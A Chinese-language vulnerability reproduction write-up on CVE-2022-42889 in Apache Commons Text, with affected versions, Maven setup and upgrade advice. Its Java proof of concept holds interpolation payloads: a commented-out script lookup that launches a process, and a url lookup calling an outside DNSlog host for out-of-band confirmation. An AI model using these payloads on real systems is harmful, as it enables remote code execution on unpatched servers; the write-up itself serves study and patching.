0x01 声明:
仅供学习参考使用,请勿用作违法用途,否则后果自负。
0x02 简介:
Apache Commons是Apache软件基金会的项目。Commons的目的是提供可重用的、开源的Java代码。Apache Commons提供了很多工具类库,几乎不依赖其他第三方的类库,接口稳定,集成简单,可以大大提高编码效率和代码质量。
0x03 漏洞概述:
Apache Commons Text 项目实现了一系列关于文本字符串的算法,专注于处理字符串和文本块。10月13日,Apache发布安全公告,修复了Apache Commons Text中的一个远程代码执行漏洞(CVE-2022-42889)。Apache Commons Text版本1.5到1.9中,由于不安全的插值默认值,当输入的参数不受信任时,可能导致远程代码执行。
0x04 影响版本:
1.5 <= Apache Commons Text 版本<= 1.9
0x05 环境搭建:
通过Maven导入jar包。
<dependencies>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-configuration2</artifactId>
<version>2.7</version>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-text</artifactId>
<version>1.9</version>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-lang3</artifactId>
<version>3.12.0</version>
</dependency>
</dependencies>
0x06 漏洞复现:
代码:
package org.example;
import org.apache.commons.text.StringSubstitutor;
public class Main {
public static void main(String[] args) {
StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
// String payload = interpolator.replace("${script:js:new java.lang.ProcessBuilder(\"calc\").start()}");
String payload = interpolator.replace("${url:utf-8:http://owncjx.dnslog.cn}");
interpolator.replace(payload);
}
}
命令执行:
DNSlog外带查询:
0x07 修复建议:
目前该漏洞已经修复,受影响用户可以升级到Apache Commons Text 1.10.0。
下载链接:
Commons Text – Download Apache Commons Texthttps://commons.apache.org/proper/commons-text/download_text.cgi
0x08 参考文档:
版权归原作者 Evan Kang 所有, 如有侵权,请联系我们删除。